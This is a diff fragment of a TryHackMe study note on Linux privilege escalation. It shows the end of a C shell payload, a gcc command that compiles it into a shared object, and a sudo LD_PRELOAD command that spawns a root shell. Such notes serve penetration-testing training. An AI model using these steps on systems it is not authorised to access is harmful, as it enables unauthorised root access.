clydebuilt1974/TryHackMe/Junior Penetration Tester/Privilege Escalation/Linux Privilege Escalation.md

 system("/bin/bash");
 }
 ```

-    * Save code as `shell.c`.
-    * Compile it using gcc (GNU Compiler Collection) into a shared object file.
+3. Compile it using gcc (GNU Compiler Collection) into a shared object file.

 ```
 gcc -fPIC -shared -o shell.so shell.c -nostartfiles
 ```
-  * Run the program with sudo rights and the LD_PRELOAD option pointing to the .so file.
+4. Run the program with sudo rights and the LD_PRELOAD option pointing to the .so file.
    * `Apache2`, `find`, or almost any of the programs that can be run with sudo can be used.
 ```
 sudo LD_PRELOAD=/home/user/ldpreload/shell.so find
 ```
-* This will result in a shell spawn with root privileges.
+5. This will result in a shell spawn with root privileges.

 ## Privilege Escalation: SUID
 * Much of Linux privilege controls relies on controlling permissions.